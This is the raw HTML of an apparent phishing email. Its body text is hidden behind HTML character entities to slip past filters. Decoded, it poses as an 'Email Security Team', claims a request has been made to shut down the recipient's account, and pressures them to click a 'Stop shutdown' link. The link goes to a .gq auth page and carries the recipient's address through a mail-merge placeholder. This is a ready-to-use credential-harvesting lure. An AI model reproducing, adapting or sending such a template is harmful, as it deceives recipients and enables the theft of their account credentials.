<HTML><HEAD>
<META name=GENERATOR content="MSHTML 11.00.9600.18349"></HEAD>
<BODY>
<DIV data-test-id="message-view-body">
<DIV class="msg-body P_wpofO iy_A" data-test-id="message-view-body-content">
<DIV class="jb_0 X_6MGW N_6Fd5">
<DIV>
<DIV id=yiv3242747808>                               
<DIV>
<TABLE style="FONT-SIZE: small; FONT-FAMILY: arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: #222222; FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; text-decoration-color: initial" align=center>
<TBODY>
<TR>
<TD style="FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<TABLE style="WIDTH: 650px; PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; MIN-HEIGHT: 80px; PADDING-RIGHT: 10px; BACKGROUND-COLOR: #1d549c; border-radius: 2px">
<TBODY>
<TR>
<TD style="FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><BR><SPAN style="FONT-SIZE: small; FONT-FAMILY: verdana; COLOR: #ffffff">&#85;&#114;&#103;&#101;&#110;&#116;&#32;&#83;&#101;&#114;&#118;&#101;&#114;&#32;&#87;&#97;&#114;&#110;&#105;&#110;&#103;&#33;</SPAN> 
<P>&nbsp;</P></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD style="FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=10>&nbsp;</TD></TR>
<TR>
<TD style="FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<TABLE style="WIDTH: 650px; PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; MIN-HEIGHT: 300px; PADDING-RIGHT: 10px; BACKGROUND-COLOR: #fafafa; border-radius: 2px">
<TBODY>
<TR>
<TD style="FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<TABLE width=550 align=center>
<TBODY>
<TR>
<TD style="FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<P>&#87;&#101;&#32;&#114;&#101;&#99;&#101;&#105;&#118;&#101;&#100;&#32;&#97;&#110;&#32;&#105;&#110;&#115;&#116;&#114;&#117;&#99;&#116;&#105;&#111;&#110;&#32;&#102;&#101;&#119;&#32;&#104;&#111;&#117;&#114;&#115;&#32;&#97;&#103;&#111;&#32;&#116;&#111;&#32;&#116;&#101;&#114;&#109;&#105;&#110;&#97;&#116;&#101;&#32;&#121;&#111;&#117;&#114;&#32;&#101;&#109;&#97;&#105;&#108;&#32;&#97;&#99;&#99;&#111;&#117;&#110;&#116; [[-Email-]]&#32;&#102;&#114;&#111;&#109;&#32;&#111;&#117;&#114;&#32;&#115;&#101;&#114;&#118;&#101;&#114;&#46;</P>
<P>&#89;&#111;&#117;&#32;&#110;&#101;&#101;&#100;&#32;&#116;&#111;&#32;&#99;&#111;&#110;&#102;&#105;&#114;&#109;&#32;&#121;&#111;&#117;&#32;&#109;&#97;&#100;&#101;&#32;&#116;&#104;&#105;&#115;&#32;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#32;&#111;&#114;&#32;&#119;&#101;&#32;&#119;&#105;&#108;&#108;&#32;&#99;&#111;&#110;&#116;&#105;&#110;&#117;&#101;&#32;&#119;&#105;&#116;&#104;&#32;&#116;&#104;&#101;&#32;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&nbsp;<BR>&#66;&#117;&#116;&#32;&#105;&#102;&#32;&#121;&#111;&#117;&#32;&#116;&#104;&#105;&#110;&#107;&#32;&#105;&#116;&#32;&#105;&#115;&#32;&#97;&#110;&#32;&#101;&#114;&#114;&#111;&#114;&#44;&#32;&#116;&#97;&#107;&#101;&#32;&#97;&#99;&#116;&#105;&#111;&#110;&#32;&#105;&#109;&#109;&#101;&#100;&#105;&#97;&#116;&#101;&#108;&#121;&#32;&#116;&#111;&#32;&#115;&#116;&#111;&#112;&#32;&#116;&#104;&#105;&#115;&#32;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#44;&#32;&#101;&#108;&#115;&#101;&#32;&#121;&#111;&#117;&#114;&#32;&#101;&#109;&#97;&#105;&#108;&#32;&#119;&#105;&#108;&#108;&#32;&#98;&#101;&#32;&#99;&#108;&#111;&#115;&#101;&#100;&#32;&#115;&#104;&#111;&#114;&#116;&#108;&#121;&#46;</P>
<P><A style="COLOR: #1155cc" href="https://3doghilll.gq/auth/66.998.09.754/index.php?email=[[-Email-]]" rel="nofollow noopener" target=_blank>&#67;&#108;&#105;&#99;&#107;&#32;&#104;&#101;&#114;&#101;&#32;&#116;&#111;&#32;&#83;&#116;&#111;&#112;&#32;&#115;&#104;&#117;&#116;&#100;&#111;&#119;&#110;</A></P>
<P>&#73;&#102;&#32;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#115;&#117;&#114;&#101;&#32;&#121;&#111;&#117;&#32;&#103;&#97;&#118;&#101;&#32;&#116;&#104;&#105;&#115;&#32;&#105;&#110;&#115;&#116;&#114;&#117;&#99;&#116;&#105;&#111;&#110;&#32;&#102;&#111;&#114;&#32;&#121;&#111;&#117;&#114;&#32;&#97;&#99;&#99;&#111;&#117;&#110;&#116;&#32;&#116;&#101;&#114;&#109;&#105;&#110;&#97;&#116;&#105;&#111;&#110;&#44;&#32;&#112;&#108;&#101;&#97;&#115;&#101;&#32;&#105;&#103;&#110;&#111;&#114;&#101;&#32;&#116;&#104;&#105;&#115;&#32;&#119;&#97;&#114;&#110;&#105;&#110;&#103;&#32;&#97;&#110;&#100;&#32;&#121;&#111;&#117;&#114;&#32;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#32;&#119;&#105;&#108;&#108;&#32;&#98;&#101;&#32;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#101;&#100;&#32;&#115;&#104;&#111;&#114;&#116;&#108;&#121;&#33;</P>
<P>&#84;&#104;&#97;&#110;&#107;&#32;&#89;&#111;&#117;&#44;&nbsp;<BR><STRONG>&#69;&#109;&#97;&#105;&#108;&#32;&#83;&#101;&#99;&#117;&#114;&#105;&#116;&#121; Team</STRONG></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV></DIV></DIV></DIV></DIV>
<DIV class="jb_0 X_6MGW N_6Fd5">&nbsp;</DIV></DIV>
<P>&nbsp;</P></BODY></HTML>